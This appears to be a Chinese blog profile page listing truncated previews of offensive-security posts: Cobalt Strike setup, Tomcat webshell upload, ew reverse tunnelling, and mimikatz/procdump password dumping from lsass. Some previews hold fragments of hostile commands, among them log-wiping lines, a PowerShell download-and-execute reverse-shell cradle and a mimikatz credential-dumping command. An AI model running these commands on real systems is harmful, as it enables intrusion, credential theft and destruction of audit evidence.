1、打开burp配置sock代理,配置sock代理127.0.0.1 80802、打开Proxifier,配置代理;点击代理服务器,添加https代理3、点击代理规则,新建代...
发简信
IP属地:福建
1、简介: Nostromo web服务(又名nhttpd),这是一个开源的web服务,在Unix系统上非常流行,例如FreeBSD, OpenBSD等等 2、漏洞原理: 漏...
执行策略 使用命令Get-ExecutionPolicy确定当前执行策略Restricted脚本不能运行 受限制的(默认设置)Unrestricted允许所有的脚本运行Rem...
下载CS 复制到kali 赋予teamserver权限,启动chmod +x teamserver./teamserver 192.168.111.111 password ...
一、CS生成shellcode 攻击-生成后门-payload generator-选veil 二、安装veil 安装docker pull mattiasohlsson/v...
查看RDP端口 查看端口REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Ser...
Tomcat 5.5.28 war文件上传漏洞 1、tomcat端口一般是80802、尝试弱口令登录tomcattomcat tomcatadmin 空口令3、新建shell...
清除日志 1、清除登录ssh登录日志、安全日志、last、lastb等cat /dev/null > /var/log/wtmpcat /dev/null > /var/lo...
dedecms 5.7后台地址爆破 1、前提条件,存在tags.php2、使用以下脚本爆破 https://github.com/qiya7/daily-code/blob/...
【Err】 拒绝访问 1、出现以上提示可能是cmd权限不足,需要自己上传一个cmd.exe,注意windows server不能使用win10的cmd,需要对应版本2、命令行...
流量代理之ew 1、ew反向代理(内网机器无公网ip需要反弹到公网,需要在vps监听)vps服务端执行:./ew_for_linux64 -s rcsocks -l 1080...
一、常用反弹命令 1、powershell反弹(win7测试可以)powershell.exe IEX (New-Object Net.WebClient).Download...
一、环境 在获取服务器权限之后,一般要获取的数据除了网站源码,还有数据库文件,这样可以本地搭建相同的环境,分析出更多的漏洞或重要数据 二、常用命令 查看mysql默认密码gr...
一、mimikatz结合procdump破解密码 mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPa...
1、procdump 上传procdump.exe从lsass.exe获取密码文件,在 lsass.exe 里并不是只存有 lm hash 和 ntlm hash 而已应该还...
桥接模式 虚拟机的桥接模式指的是既可以访问外网,同时也可以访问局域网内其他机器,包括物理机本身。一般要日内网同网段其他机器时使用 1、编辑-虚拟网络编辑器-自定义添加-桥接模...
0x01 fofa收集目标 title="网络智能办公管理系统"app="通达OA" 0x02测试是否存在上传漏洞 访问[ip地址:端口]/general/vmeet/wbU...
一、环境 antsword2.0.5以前,antsword使用了Electron,Electron是由Github开发,用HTML,CSS和JavaScript来构建跨平台桌...